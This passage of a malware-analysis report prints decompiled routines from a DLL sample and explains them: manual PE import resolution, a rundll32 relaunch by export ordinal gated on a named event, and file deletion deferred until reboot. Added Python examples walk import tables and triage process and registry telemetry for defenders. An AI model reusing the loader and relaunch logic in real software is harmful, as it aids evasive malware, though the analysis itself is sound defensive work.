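    struct.pack_into(DESC_FMT, img, 0x14, 0x60, 0, 0, 0xB0, 0x70)  # user32:   ILT 0x60, IAT 0x70
    # the descriptor at 0x28 stays all-zero: that is the terminator
    for rva in (0x40, 0x50):  # kernel32 thunks: two imports by name, then 0
        struct.pack_into("<III", img, rva, 0xC0, 0xD0, 0)
    for rva in (0x60, 0x70):  # user32 thunk: one import by ordinal #1, then 0
        struct.pack_into("<II", img, rva, IMAGE_ORDINAL_FLAG32 | 1, 0)
    img[0xA0:0xA0 + 13] = b"kernel32.dll\0"
    img[0xB0:0xB0 + 11] = b"user32.dll\0"
    img[0xC0:0xC0 + 15] = struct.pack("<H", 0) + b"LoadLibraryA\0"   # hint word, then name
    img[0xD0:0xD0 + 17] = struct.pack("<H", 0) + b"GetProcAddress\0"
    return img


def cstr(buf, off):
    """NUL-terminated ASCII string starting at offset `off`."""
    return bytes(buf[off:buf.index(b"\0", off)])


def resolve_imports(img, modules, import_dir_rva=0):
    """Walk the descriptors and patch every IAT slot with a resolved address.

    Returns (status, loaded_modules). Status 0: all imports resolved;
    6: a module or function could not be resolved; 8: a descriptor has
    no thunk array to read names from.
    """
    loaded = []
    off = import_dir_rva
    while True:
        oft, _stamp, _fwd, name_rva, ft = struct.unpack_from(DESC_FMT, img, off)
        if name_rva == 0:  # terminating descriptor: done
            return 0, loaded
        dll = cstr(img, name_rva).decode("ascii").lower()
        mod = modules.get(dll)
        if mod is None:  # LoadLibraryA failed
            return 6, loaded
        loaded.append(dll)
        lookup = oft or ft  # no ILT: the unbound IAT still holds the original thunks
        if lookup == 0:
            return 8, loaded
        i = 0
        while True:
            thunk = struct.unpack_from("<I", img, lookup + 4 * i)[0]
            if thunk == 0:
                break
            if thunk & IMAGE_ORDINAL_FLAG32:  # high bit set: import by ordinal
                addr = mod["ordinals"].get(thunk & 0xFFFF)
            else:  # otherwise an RVA to IMAGE_IMPORT_BY_NAME; +2 skips the hint
                addr = mod["names"].get(cstr(img, thunk + 2).decode("ascii"))
            if addr is None:  # GetProcAddress failed
                return 6, loaded
            struct.pack_into("<I", img, ft + 4 * i, addr)  # patch the IAT slot
            i += 1
        off += DESC_SIZE


def read_iat(img, rva):
    """The resolved slots of one IAT, up to its zero terminator."""
    out = []
    while True:
        v = struct.unpack_from("<I", img, rva + 4 * len(out))[0]
        if v == 0:
            return out
        out.append(v)


if __name__ == "__main__":
    image = build_image()
    print(resolve_imports(image, FAKE_MODULES))
    print([hex(v) for v in read_iat(image, 0x50)], [hex(v) for v in read_iat(image, 0x70)])
```

When triaging a manually mapped payload, the same walk run over the dumped image tells you which DLLs and functions the stage will pull in before it executes; an IAT whose slots still hold small RVAs (as at 0x40 and 0x60 in the constructed image before patching) has not been fixed up yet, while one filled with module-range addresses has.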

    C-Code - Quality: 100%
    			E6ECA175E(intOrPtr __eax, void* __edi, intOrPtr* _a12, struct HINSTANCE__* _a16) {
    				intOrPtr _t34;
    				struct HINSTANCE__* _t35;
    				signed int _t37;
    				intOrPtr _t38;
    				signed short _t39;
    				CHAR* _t41;
    				_Unknown_base(*)()* _t43;
    				signed int _t45;
    				signed int _t46;
    				signed int _t47;
    				signed int _t51;
    				void* _t52;
    				intOrPtr* _t57;
    				signed short* _t59;
    				intOrPtr _t65;
    				intOrPtr* _t68;
    				void* _t73;
    				signed short* _t76;
    				void* _t81;
    				signed short _t103;
    
    				_t73 = __edi;
    				_t34 = __eax;
    				while(1) {
    					_t57 = _a12;
    					_t35 = LoadLibraryA( *((intOrPtr*)(_t73 + 0x144)) + _t34);
    					_a16 = _t35;
    					if(_t35 == 0) {
    						break;
    					}
    					_t37 =  *(_t73 + 0x154);
    					if( *(_t73 + 0x150) < _t37) {
    						L13:
    						if(_t81 != 0) {
    							_t45 =  *(_t73 + 0x150);
    							_t46 = _t45 + 1;
    							 *(_t73 + 0x150) = _t46;
    							if( *((intOrPtr*)(_t81 + _t45 * 4)) != 0) {
    								 *((intOrPtr*)(_t81 + _t46 * 4)) = _a16;
    								 *(_t73 + 0x150) =  *(_t73 + 0x150) + 1;
    							}
    						}
    						_t38 =  *((intOrPtr*)(_t73 + 0x144));
    						_t68 = _a12;
    						_t76 =  *((intOrPtr*)(_t57 + 0x10)) + _t38;
    						_t59 = _t76;
    						if( *((intOrPtr*)(_t68 + 4)) == 0) {
    							L19:
    							_t39 =  *_t59;
    							_t103 = _t39;
    							if(_t103 == 0) {
    								L26:
    								_t34 =  *((intOrPtr*)(_t68 + 0x20));
    								_a12 = _t68 + 0x14;
    								if(_t34 != 0) {
    									continue;
    								} else {
    									return 0;
    								}
    							} else {
    								L20:
    								L20:
    								if(_t103 >= 0) {
    									_t41 = _t39 +  *((intOrPtr*)(_t73 + 0x144)) + 2;
    								} else {
    									_t41 = _t39 & 0x0000ffff;
    								}
    								_t43 = GetProcAddress(_a16, _t41);
    								 *_t76 = _t43;
    								if(_t43 == 0) {
    									break;
    								}
    								_t39 = _t59[2];
    								_t59 =  &(_t59[2]);
    								_t76 =  &(_t76[2]);
    								if(_t39 != 0) {
    									goto L20;
    								} else {
    									_t68 = _a12;
    									goto L26;
    								}
    							}
    						} else {
    							_t65 =  *_t68;
    							if(_t65 == 0) {
    								return 8;
    							} else {
    								_t59 = _t65 + _t38;
    								goto L19;
    							}
    						}
    					} else {
    						if(_t37 == 0) {
    							_t47 = 0x10;
    						} else {
    							_t47 = _t37 + _t37;
    						}
    						 *(_t73 + 0x154) = _t47;
    						_t81 = HeapAlloc(GetProcessHeap(), 8, _t47 * 4);
    						if(_t81 == 0) {
    							return 3;
    						} else {
    							_t51 =  *(_t73 + 0x150);
    							if(_t51 != 0) {
    								RtlMoveMemory(_t81,  *(_t73 + 0x14c), _t51 + _t51 + _t51 + _t51);
    							}
    							_t52 =  *(_t73 + 0x14c);
    							if(_t52 != 0) {
    								HeapFree(GetProcessHeap(), 0, _t52);
    							}
    							 *(_t73 + 0x14c) = _t81;
    							goto L13;
    						}
    					}
    					L31:
    				}
    				return 6;
    				goto L31;
    			}

    APIs
    • LoadLibraryA.KERNEL32(?), ref: 6ECA176D
    • GetProcessHeap.KERNEL32(00000008), ref: 6ECA17B0
    • HeapAlloc.KERNEL32(00000000), ref: 6ECA17B3
    • RtlMoveMemory.NTDLL(00000000,?,?), ref: 6ECA17DA
    • GetProcessHeap.KERNEL32(00000000,?), ref: 6ECA17EC
    • HeapFree.KERNEL32(00000000), ref: 6ECA17EF
    • GetProcAddress.KERNEL32(?,?), ref: 6ECA185F
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$Process$AddressAllocFreeLibraryLoadMemoryMoveProc
    • String ID:
    • API String ID: 2239585089-0
    • Opcode ID: 018c14f5987ff35fe1938d19b645e29bb3bf1c5fbbb57bb34a808b4776fc8471
    • Instruction ID: f20c6efff91a0a937311c3a180916b16075210689d6170a007e3d42a2972bb5e
    • Opcode Fuzzy Hash: 018c14f5987ff35fe1938d19b645e29bb3bf1c5fbbb57bb34a808b4776fc8471
    • Instruction Fuzzy Hash: 6F314CB4A007079BE744CFADD954BA6B7A9FB88305F018569ED29CB304F730E818CB90
    Uniqueness

    Uniqueness Score: -1.00%
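
The loop in E6ECA175E is the import-fixup stage of a manual PE loader: for each IMAGE_IMPORT_DESCRIPTOR (0x14 bytes, read relative to the image base kept at context+0x144) it calls LoadLibraryA on the Name field, records the HMODULE in a heap-allocated array at context+0x14c (count at +0x150, capacity at +0x154, grown from 0x10 entries by doubling with HeapAlloc/RtlMoveMemory/HeapFree), then walks the thunk array, treating a thunk whose top bit is set as an ordinal (`_t39 & 0xffff`) and any other as an RVA to an IMAGE_IMPORT_BY_NAME whose string starts two bytes past the hint, and stores each GetProcAddress result into the FirstThunk slot. It returns 0 when the next descriptor's Name (offset 0x20 from the current one) is zero, 3 if HeapAlloc fails, 6 if LoadLibraryA or GetProcAddress returns NULL, and 8 if the selected thunk table is NULL. The page does not show who calls it, so whether it operates on the LZNT1-unpacked image produced by E6ECA2260 further down is not established here.

The following walker is an added example for this report, not code recovered from the sample. It replicates the descriptor and thunk parsing on a constructed in-memory image (RVA == offset, matching the loader's `base + rva` reads) and replaces LoadLibraryA/GetProcAddress with a caller-supplied lookup so it runs on any OS; the sample image, DLL names and fake addresses are all invented for the example.

```python
"""Import-directory walk matching the decompiled loop in E6ECA175E.

Added example for this report, not code recovered from the sample. It runs
on a constructed image (RVA == offset) and replaces the Windows resolver
calls with a caller-supplied lookup function.
"""
import struct

IMAGE_ORDINAL_FLAG32 = 0x80000000
DESCRIPTOR_SIZE = 0x14          # sizeof(IMAGE_IMPORT_DESCRIPTOR)


def read_u32(image, rva):
    return struct.unpack_from("<I", image, rva)[0]


def _cstr(image, rva):
    return bytes(image[rva:image.index(b"\x00", rva)]).decode("ascii")


def walk_imports(image, import_dir_rva):
    """Yield (dll, first_thunk_slot_rva, import) for every import.

    `import` is an int (ordinal, low 16 bits of the thunk) when the thunk's
    top bit is set, else the str at thunk + 2 (past IMAGE_IMPORT_BY_NAME.Hint).
    Like the decompiled code, the name table is OriginalFirstThunk unless the
    descriptor's TimeDateStamp (+4) is zero, in which case FirstThunk is read
    (a conventional loader tests OriginalFirstThunk == 0 instead).
    """
    desc = import_dir_rva
    while True:
        oft, tds, _fwd, name_rva, ft = struct.unpack_from("<5I", image, desc)
        if name_rva == 0:            # `*(_t68 + 0x20) == 0`: last descriptor
            return
        dll = _cstr(image, name_rva)
        table = ft if tds == 0 else oft
        if table == 0:               # the loader's `return 8`
            raise ValueError("descriptor at %#x has no thunk table" % desc)
        idx = 0
        while True:
            thunk = read_u32(image, table + idx * 4)
            if thunk == 0:
                break
            if thunk & IMAGE_ORDINAL_FLAG32:
                imp = thunk & 0xFFFF             # `_t39 & 0xffff`
            else:
                imp = _cstr(image, thunk + 2)    # `_t39 + base + 2`
            yield dll, ft + idx * 4, imp
            idx += 1
        desc += DESCRIPTOR_SIZE


def resolve_imports(image, import_dir_rva, lookup):
    """Write lookup(dll, import) into each FirstThunk slot (`*_t76 = _t43`).

    A lookup result of 0 aborts, as a failed GetProcAddress does (return 6).
    Returns the number of slots patched."""
    patched = 0
    for dll, slot, imp in walk_imports(image, import_dir_rva):
        addr = lookup(dll, imp)
        if not addr:
            raise LookupError("unresolved import %s!%r" % (dll, imp))
        struct.pack_into("<I", image, slot, addr)
        patched += 1
    return patched


def build_sample_image():
    """Constructed 0x200-byte image (not from the sample) with two descriptors:
    KERNEL32.dll imported by name with TimeDateStamp 0 (so FirstThunk is read
    as the name table) and ADVAPI32.dll imported by ordinal 123."""
    img = bytearray(0x200)
    struct.pack_into("<5I", img, 0x100, 0x140, 0, 0, 0x1B0, 0x150)
    struct.pack_into("<5I", img, 0x114, 0x160, 0x5F3E1234, 0, 0x1C0, 0x170)
    for rva in (0x140, 0x150):
        struct.pack_into("<3I", img, rva, 0x180, 0x190, 0)
    for rva in (0x160, 0x170):
        struct.pack_into("<2I", img, rva, IMAGE_ORDINAL_FLAG32 | 123, 0)
    img[0x180:0x180 + 15] = b"\x00\x00LoadLibraryA\x00"
    img[0x190:0x190 + 17] = b"\x00\x00GetProcAddress\x00"
    img[0x1B0:0x1B0 + 13] = b"KERNEL32.dll\x00"
    img[0x1C0:0x1C0 + 13] = b"ADVAPI32.dll\x00"
    return img


IMPORT_DIR_RVA = 0x100
```

Run `list(walk_imports(build_sample_image(), IMPORT_DIR_RVA))` to see the three imports; `resolve_imports` with a dict-backed lookup patches the FirstThunk slots in place exactly as the loader does, so a second walk over the same TimeDateStamp-0 descriptor would read addresses instead of name RVAs, which is the reason real loaders prefer OriginalFirstThunk.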

    C-Code - Quality: 92%
    			E6ECA4230(intOrPtr _a4, intOrPtr _a8, DWORD* _a12) {
    				intOrPtr _v0;
    				intOrPtr _v4;
    				struct _SHELLEXECUTEINFOA _v68;
    				intOrPtr _t22;
    				intOrPtr _t23;
    				intOrPtr _t24;
    				int _t25;
    				DWORD* _t27;
    				int _t35;
    				signed int _t38;
    				long _t40;
    
    				_push(0x3c);
    				_push( &(_v68.hwnd));
    				L6ECAC2EE();
    				_t22 = _v0;
    				_v68.cbSize = 0x3c;
    				_v68.fMask = 0x800400;
    				_v68.nShow = 0;
    				if(_t22 != 0) {
    					_v68.lpFile = _t22;
    				}
    				_t23 = _a4;
    				if(_t23 != 0) {
    					_v68.lpParameters = _t23;
    				}
    				_t24 = _v4;
    				if(_t24 != 0) {
    					_v68.lpVerb = _t24;
    				}
    				if(_a8 == 0) {
    					_v68.fMask = 0x808400;
    				} else {
    					_v68.nShow = 1;
    				}
    				_t38 = _a12;
    				if(_t38 != 0) {
    					_v68.fMask = _v68.fMask | 0x00000040;
    				}
    				_t25 = ShellExecuteExA( &_v68);
    				_t35 = _t25;
    				if(_t35 != 0 && _t38 != 0) {
    					if(_t38 == 0xffffffff) {
    						_t40 = _t38 | 0xffffffff;
    					} else {
    						_t40 = _t38 * 0x3e8;
    					}
    					WaitForSingleObject(_v68.hIcon, _t40);
    					_t27 = _a12;
    					if(_t27 != 0) {
    						GetExitCodeProcess(_v68.hIcon, _t27);
    					}
    					CloseHandle(_v68.hIcon);
    					_t25 = _t35;
    				}
    				return _t25;
    			}

    APIs
    • RtlZeroMemory.NTDLL(0000003C,0000003C), ref: 6ECA423A
    • ShellExecuteExA.SHELL32(0000003C,00000000,00000000), ref: 6ECA42A7
    • WaitForSingleObject.KERNEL32(?,?), ref: 6ECA42CD
    • GetExitCodeProcess.KERNEL32 ref: 6ECA42E1
    • CloseHandle.KERNEL32(?), ref: 6ECA42EC
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseCodeExecuteExitHandleMemoryObjectProcessShellSingleWaitZero
    • String ID: @
    • API String ID: 1639083440-2766056989
    • Opcode ID: c9999b6bb2a45f08d23318389a7cd228fe0b0adcfbd4410ba2c9666dce4497e2
    • Instruction ID: 54057a3d186e8bfcfaef3aa5c5b4ee36cabf0466ba66f765caaa050029c1e49b
    • Opcode Fuzzy Hash: c9999b6bb2a45f08d23318389a7cd228fe0b0adcfbd4410ba2c9666dce4497e2
    • Instruction Fuzzy Hash: 1F2128715097029BD3408A9D8544B5FBBF9BB85714F008A1DBAA497284EB74C806CB52
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 70%
    			E6ECA5190(intOrPtr _a4) {
    				char _v772;
    				char _v780;
    				void* _t4;
    				char* _t5;
    				char _t6;
    				intOrPtr _t11;
    				CHAR* _t14;
    
    				_t11 = _a4;
    				if(_t11 != 0x65 ||  *0x6ecb027c >= 6 && M6ECB0544 == 0 && M6ECB0548 != 0) {
    					_t4 = OpenEventA(2, 0, "TVRF_Instance");
    					if(_t4 == 0) {
    						_t5 = M6ECB0530; // 0xcb2c98
    						_t14 = M6ECB0524; // 0xcd1c70
    						_t6 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1a50
    						wsprintfA( &_v780, "\"%s%s\" \"%s\",#%d %c \"%s\"", _t6, "rundll32.exe", _t14, 0x195, _t11, _t5);
    						_push(0);
    						_push(0);
    						_push(0);
    						_push(0);
    						return E6ECA4EF0( &_v772, 1, 0);
    					} else {
    						CloseHandle(_t4);
    						goto L6;
    					}
    				} else {
    					L6:
    					return 0;
    				}
    			}

    APIs
    • OpenEventA.KERNEL32(00000002,00000000,TVRF_Instance), ref: 6ECA51C7
    • CloseHandle.KERNEL32(00000000), ref: 6ECA51D2
    • wsprintfA.USER32 ref: 6ECA520D
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseEventHandleOpenwsprintf
    • String ID: "%s%s" "%s",#%d %c "%s"$TVRF_Instance$rundll32.exe
    • API String ID: 3063877008-2939335533
    • Opcode ID: ad452c2552351848df9b03bba34a11a097b57ac78093a2f6673a2fc0be17a7a2
    • Instruction ID: dbcd9f3f5c6c586b0a1426d288a2d4f2bc8b0cf0cef413f2477f3d6c70c133d5
    • Opcode Fuzzy Hash: ad452c2552351848df9b03bba34a11a097b57ac78093a2f6673a2fc0be17a7a2
    • Instruction Fuzzy Hash: CD01F7B1591702BBEF10D7A8CE56FB73BBAAB45709F404508BF1486584F2789548CF22
    Uniqueness

    Uniqueness Score: -1.00%
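
E6ECA5190 is a single-instance gate plus relaunch: it opens the event "TVRF_Instance" and, when no instance exists, formats the command line `"%s%s" "%s",#%d %c "%s"` with "rundll32.exe" and 0x195, i.e. it relaunches its own DLL through rundll32 by export ordinal #405 rather than by name, and hands the line to E6ECA4EF0. Invocation of a DLL by ordinal from a non-system directory is a cheap thing to look for in process-creation telemetry.

The triage routine below is an added example for this report, not code from the sample or from the sandbox. It assumes process-creation records that carry a CommandLine field (Sysmon event 1 or security event 4688 are the usual sources) and works on constructed stand-in lines; the tag names, the directory lists and the sample paths are this example's own.

```python
r"""Triage rundll32 command lines of the shape E6ECA5190 builds:
"<dir>rundll32.exe" "<dll>",#405 <c> "<arg>"   (0x195 == 405).

Added example, not from the sample or the sandbox. The events below are
constructed stand-ins for process-creation CommandLine fields.
"""
import re

RUNDLL32_RE = re.compile(
    r'rundll32(?:\.exe)?"?\s+"?(?P<dll>[^",]+?)"?\s*,\s*'
    r'(?P<export>#\d+|[A-Za-z_][\w@]*)',
    re.IGNORECASE)
# Assumed locations; adjust to the estate being monitored.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")


def analyze_rundll32(cmdline):
    """Return {"dll", "export", "tags"} for a rundll32 line, else None."""
    m = RUNDLL32_RE.search(cmdline)
    if m is None:
        return None
    dll, export = m.group("dll").strip(), m.group("export")
    low = dll.lower()
    tags = set()
    if export.startswith("#"):          # export addressed by ordinal, as here
        tags.add("ordinal_export")
    if "\\" not in dll:                 # bare name: resolved via search order
        tags.add("unqualified_dll_name")
    elif not low.startswith(SYSTEM_DIRS):
        tags.add("dll_outside_system_dirs")
    if low.startswith(USER_WRITABLE):
        tags.add("dll_in_user_writable_dir")
    if not low.endswith(".dll"):
        tags.add("non_dll_extension")
    return {"dll": dll, "export": export, "tags": tags}


def triage(events):
    """Return (cmdline, analysis) for every event that fires at least one tag."""
    hits = []
    for ev in events:
        res = analyze_rundll32(ev)
        if res and res["tags"]:
            hits.append((ev, res))
    return hits


# Constructed events (not sandbox output). The first has the shape of the
# relaunch line assembled by E6ECA5190; 'e' is the 0x65 the function tests.
SAMPLE_EVENTS = [
    r'"C:\Windows\System32\rundll32.exe" "C:\Users\alice\AppData\Local\Temp\example.dll",#405 e "C:\Users\alice\AppData\Local\Temp\example.dll"',
    r"rundll32.exe C:\ProgramData\Example\svc.dll,SvcEntry",
    r"rundll32.exe shell32.dll,Control_RunDLL",
    r"C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
]
```

`triage(SAMPLE_EVENTS)` flags the first three lines and passes the fully qualified system32 invocation; the ordinal tag on its own is weak evidence, since some legitimate shell32/ieframe entry points are also called by ordinal, which is why it is combined with the path checks.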

    C-Code - Quality: 100%
    			E6ECA2E59(struct _WIN32_FIND_DATAA _a16, char _a60, char _a336, char _a344) {
    				signed char _t9;
    				CHAR* _t16;
    				void* _t18;
    				void* _t23;
    				void* _t28;
    
    				do {
    					_t9 = _a16.dwFileAttributes;
    					if((_t9 & 0x00000010) == 0 && _t9 != 0) {
    						wsprintfA( &_a336, "%s%s", _t18,  &_a60);
    						_t28 = _t28 + 0x10;
    						_t16 = DeleteFileA( &_a344);
    						if(_t16 == 0) {
    							MoveFileExA( &_a344, _t16, 4);
    						}
    					}
    				} while (FindNextFileA(_t23,  &_a16) != 0);
    				FindClose(_t23);
    				return 1;
    			}

    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: File$Find$CloseDeleteMoveNextwsprintf
    • String ID: %s%s
    • API String ID: 2350977733-3252725368
    • Opcode ID: f30f7d6d3de9e78fe4b86a46a95b702bdcdc73696cc847849e72f6346d20426c
    • Instruction ID: 43fd6af11a3032af3c189f9ae37ad077691d8074550beab07b17d405acaa64db
    • Opcode Fuzzy Hash: f30f7d6d3de9e78fe4b86a46a95b702bdcdc73696cc847849e72f6346d20426c
    • Instruction Fuzzy Hash: B7F08C31204305ABD760DAA8CC48FEF77BCEB85726F400829FE85C3104EB35A1448A52
    Uniqueness

    Uniqueness Score: -1.00%
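
E6ECA2E59 walks a FindFirstFile/FindNextFile listing, skips directories (attribute 0x10), builds each path with "%s%s" and calls DeleteFileA; when that fails it calls MoveFileExA(path, NULL, 4), where 4 is MOVEFILE_DELAY_UNTIL_REBOOT and the NULL new name is the zero DeleteFileA just returned. That combination does not touch the file now: it appends a (source, "") pair to the REG_MULTI_SZ value PendingFileRenameOperations under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager, and smss.exe deletes the file at the next boot. On a live host or a collected SYSTEM hive that value is where the deferred deletions can still be seen.

The parser below is an added example for this report, not code from the sample. It decodes the raw value bytes into (source, target, action) triples and flags entries in user-writable trees; the sample value, the paths in it and the watch-list directories are constructed.

```python
r"""Parse PendingFileRenameOperations, the boot-time work list that
MoveFileExA(path, NULL, MOVEFILE_DELAY_UNTIL_REBOOT) adds to when the
DeleteFileA in E6ECA2E59 fails.

Added example, not code from the sample. The value is REG_MULTI_SZ under
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager and is consumed by
smss.exe as consecutive NUL-terminated (source, target) pairs: an empty
target deletes the source, a target prefixed with "!" replaces an existing
file. The sample value and the watch-list directories are constructed.
"""

NT_PREFIX = "\\??\\"


def _nt_to_win32(path):
    """Strip the object-manager prefix the value stores paths with."""
    return path[len(NT_PREFIX):] if path.startswith(NT_PREFIX) else path


def parse_pending_file_renames(raw):
    """Return [(source, target, action)] from the raw REG_MULTI_SZ bytes
    (or from an already-split list of strings)."""
    if isinstance(raw, (bytes, bytearray)):
        strings = raw.decode("utf-16-le").split("\x00")
        if strings and strings[-1] == "":
            strings.pop()                       # the value's final terminator
    else:
        strings = list(raw)
    ops = []
    for i in range(0, len(strings), 2):
        src = strings[i]
        if src == "":                           # padding left by a trailing delete
            continue
        dst = strings[i + 1] if i + 1 < len(strings) else ""
        if dst == "":
            action = "delete"
        elif dst.startswith("!"):
            action, dst = "replace", dst[1:]
        else:
            action = "rename"
        ops.append((_nt_to_win32(src), _nt_to_win32(dst), action))
    return ops


# Assumed user-writable trees worth flagging; adjust per environment.
WATCH_DIRS = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")


def suspicious_pending_ops(ops, watch_dirs=WATCH_DIRS):
    """Keep operations whose source or target lies in a watched tree."""
    hits = []
    for src, dst, action in ops:
        if any(p.lower().startswith(watch_dirs) for p in (src, dst) if p):
            hits.append((src, dst, action))
    return hits


def build_sample_value():
    """Constructed REG_MULTI_SZ bytes: one delete, one replace, one rename."""
    entries = [
        NT_PREFIX + r"C:\Users\alice\AppData\Local\Temp\example1.tmp", "",
        NT_PREFIX + r"C:\Windows\Temp\example2.dll",
        "!" + NT_PREFIX + r"C:\Program Files\Example\example2.dll",
        NT_PREFIX + r"C:\Program Files\Example\old.txt",
        NT_PREFIX + r"C:\Program Files\Example\new.txt",
    ]
    return ("\x00".join(entries) + "\x00\x00").encode("utf-16-le")
```

On a live system the bytes come from `winreg.QueryValueEx` (or from an exported hive); a delete entry for a file that still exists at boot is the trace this routine leaves when the DLL cannot remove the file in-process.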

    C-Code - Quality: 38%
    			E6ECA4A20() {
    				char _v4;
    				char _v12;
    				char _v16;
    				intOrPtr _v32;
    				intOrPtr* _v36;
    				char _v40;
    				char _v44;
    				intOrPtr* _v48;
    				char _v52;
    				intOrPtr* _v56;
    				intOrPtr* _v60;
    				intOrPtr _v64;
    				intOrPtr* _v68;
    				char _v72;
    				intOrPtr* _v76;
    				char _v80;
    				intOrPtr* _v84;
    				char _v88;
    				intOrPtr* _v100;
    				char _v104;
    				intOrPtr* _v108;
    				intOrPtr* _v124;
    				intOrPtr _v128;
    				intOrPtr* _v132;
    				intOrPtr* _v136;
    				intOrPtr _v140;
    				intOrPtr* _v148;
    				intOrPtr* _t67;
    				intOrPtr* _t70;
    				intOrPtr* _t73;
    				intOrPtr* _t76;
    				intOrPtr* _t78;
    				intOrPtr* _t81;
    				intOrPtr* _t84;
    				intOrPtr* _t87;
    				intOrPtr* _t89;
    				intOrPtr* _t94;
    				intOrPtr* _t97;
    				intOrPtr* _t99;
    				intOrPtr* _t102;
    				intOrPtr* _t104;
    				intOrPtr* _t106;
    				intOrPtr* _t108;
    				intOrPtr* _t111;
    				void* _t150;
    				void* _t151;
    				void* _t153;
    				intOrPtr* _t154;
    				void* _t156;
    				intOrPtr _t157;
    				intOrPtr* _t158;
    
    				_t158 = __imp__CoCreateInstance;
    				_push( &_v16);
    				_push(0x6ecae08c);
    				_push(1);
    				_push(0);
    				_push(0x6ecae0cc);
    				_v12 = 0;
    				_v4 = 0;
    				_v16 = 0;
    				if( *_t158() < 0) {
    					L26:
    					return _v32;
    				}
    				_t67 = _v36;
    				_v40 = 0;
    				_push( &_v40);
    				_push(_t67);
    				if( *((intOrPtr*)( *((intOrPtr*)( *_t67 + 0x1c))))() < 0) {
    					L25:
    					_t70 = _v44;
    					 *((intOrPtr*)( *((intOrPtr*)( *_t70 + 8))))(_t70);
    					if(_v36 != 0) {
    						return 1;
    					}
    					goto L26;
    				}
    				_t73 = _v48;
    				_v52 = 0;
    				_push( &_v52);
    				_push(_t73);
    				if( *((intOrPtr*)( *((intOrPtr*)( *_t73 + 0x1c))))() < 0) {
    					L24:
    					_t76 = _v56;
    					 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 8))))(_t76);
    					goto L25;
    				} else {
    					_t78 = _v60;
    					_v44 = 0;
    					_push( &_v44);
    					_push(_t78);
    					if( *((intOrPtr*)( *((intOrPtr*)( *_t78 + 0x20))))() >= 0 && _v52 != 0) {
    						_v48 = 1;
    					}
    					_t81 = _v68;
    					_v72 = 0;
    					_push( &_v72);
    					_push(_t81);
    					if( *((intOrPtr*)( *((intOrPtr*)( *_t81 + 0x50))))() < 0) {
    						L23:
    						_t84 = _v76;
    						 *((intOrPtr*)( *((intOrPtr*)( *_t84 + 8))))(_t84);
    						goto L24;
    					}
    					_t154 = __imp__#2;
    					_t151 =  *_t154(_v44, _t150, _t153);
    					if(_t151 == 0) {
    						L22:
    						_t87 = _v84;
    						 *((intOrPtr*)( *((intOrPtr*)( *_t87 + 8))))(_t87);
    						goto L23;
    					}
    					_t89 = _v84;
    					_push( &_v88);
    					_v88 = 0;
    					_push(_t151);
    					_push(_t89);
    					if( *((intOrPtr*)( *((intOrPtr*)( *_t89 + 0x28))))() < 0) {
    						if(_v64 != 0) {
    							_t156 =  *_t154(_v56);
    							if(_t156 != 0) {
    								_push( &_v104);
